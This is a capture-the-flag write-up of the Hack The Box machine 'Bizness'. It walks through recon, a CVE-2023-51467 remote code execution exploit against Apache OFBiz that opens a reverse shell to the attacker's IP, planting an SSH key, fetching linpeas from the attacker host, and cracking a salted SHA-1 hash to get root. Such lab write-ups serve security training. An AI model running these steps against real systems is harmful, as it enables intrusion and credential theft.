🐒BIZNESS
Welcome, cyber adventurers! Embark on a thrilling journey through "Bizness" on Hack The Box (HTB) in this Open Beta 4 edition. As you gear up for adrenaline-pumping challenges, I extend my best wishes

Hacking Phases for Bizness HTB:
Information Gathering
Directory Enumeration
Vulnerability Analysis
Exploitation
Privilege Escalation
Let's dive into the digital depths!
I => Information Gathering
Initial Reconnaissance
Our first maneuver involves deploying nmap
for active port reconnaissance.
Command:
sudo nmap -p- --min-rate 10000 10.10.11.252
Result Snapshot:
Open Ports: 22 (SSH), 80 (HTTP), 443 (HTTPS), 38621 (Unknown)
Host Discovery: bizness.htb (10.10.11.252) discovered with significant latency.
Action:
Redirected to https://bizness.htb. Updated our
/etc/hosts
file.Initial website visit was inconclusive.
Visual Insight:

II => Directory Enumeration
Uncovering Hidden Gems
Using dirsearch
to reveal obscured paths.
Command:
dirsearch -q -u https://bizness.htb -i 200,300-399
Findings:
Discovered a login page at http://bizness.htb/control/login.
Apache OFBiz in use – a potential exploit target.
Visual Evidence:


III => Vulnerability Analysis
Identifying the Achilles' Heel
Discovered a critical CVE for Apache OFBiz - CVE-2023-51467, indicating Remote Code Execution (RCE).
Intel Source:
IV => Exploitation
Deploying the Cyber Arsenal
Found a repository tailor-made for exploiting this CVE.
Exploit Repository: CVE-2023-51467 Exploit
Gaining the Foothold
Exploit Execution:
python3 exploit.py https://bizness.htb/ shell <IP-tun0>:<PORT>
Result:
Successfully established a reverse shell.
Shell Stabilization:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Background the shell with ctrl + z, then:
stty raw -echo; fg
reset xterm
Victory Snapshot:

Achievement Unlocked: User Compromised
cat ~/user.txt
# User flag acquired
V => Privilege Escalation
Establishing a Strong hold
Command:
cd /home/ofbiz/
mkdir .ssh
echo [your_public_key] > ~/.ssh/authorized_keys
Secure Access:
ssh -i [private_key] ofbiz@bizness.htb
Privilege Escalation Attempts
Searching for SUID Files
Checked for exploitable SUID files.
Command:
find / -type f -perm /4000 2>/dev/null
Outcome:
No significant SUID files found.
Scanning for Internal Ports
Searched for listening internal ports.
Command:
netstat -ano
Outcome:
No notable internal ports detected.
Automated Scouting with LinPEAS
Deployed linpeas.sh
for vulnerability scanning.
LinPEAS Deployment:
cd /tmp
wget http://<IP-tun0>:<port>/linpeas.sh
bash ./linpeas.sh
Further Analysis: Re-ran LinPEAS and saved output for detailed local analysis.
On the Target Machine:
bash ./linpeas.sh > /tmp/linpease.txt
On the Local Machine:
scp -i ~/.ssh/id_rsa ofbiz@bizness.htb:/tmp/linpease.txt ./
Outcome:
LinPEAS did not reveal significant leads, hinting at a potential rabbit hole.
Exploring Alternative Avenues
The Quest for Ultimate Power
The search for a direct escalation path was challenging, but persistence led to potential password clues.
Password Hunt:
grep -aRinH --color -o -E '(\w+\w+){0,5}password(\w+\w+){0,5}'
Discovery:
Files indicating password usage.
Encountered a SHA-1 hash and a .dat file revealing a Base64 encoded SHA1 structure.
Crucial Discovery:

I found this XML file and the hashed password.

As you're aware, cracking the SHA was an insurmountable task without knowing the SALT value. Therefore, I embarked on a meticulous search through various files that contained password-related data, specifically looking for a pattern akin to (($SHA1)($SALT)($HASH))
$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
Encountered a SHA-1 hash and a .dat file revealing a Base64 encoded SHA1 structure.

Cracking the Hash
Python Script for Decryption: Script for SHA1 Decryption
Hashcat Strategy:
Converted from base64 using CyberChef for Hashcat compatibility. CyberChef
To effectively utilize Hashcat for our cracking purposes, a preliminary step of data refinement is necessary. This is due to the initial encoding using
base64.urlsafe_b64encode()
, which modifies certain characters - '/' becomes '_', and '+' is turned into '-'. To rectify this and prepare our data accurately for Hashcat, we'll employ the capabilities of CyberChef. This tool is adept at making the required character replacements and transforming our data into a hex format. This conversion is a critical process to ensure that the data is in the optimal format for our subsequent cracking procedures with Hashcat.cleaning the shity hashed password Hashcat command:
hashcat -m 120 -a 0 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" rockyou.txt
Eureka Moment:

Root password is: monkeybizness
Final Triumph:

Command:
su root
# Enter the password 'monkeybizness'
cat /root/root.txt
# Root flag successfully captured
ANOTHER${IFS}SHITY${IFS}THING<<<SEE${IFS}YOU/:
Last updated
Was this helpful?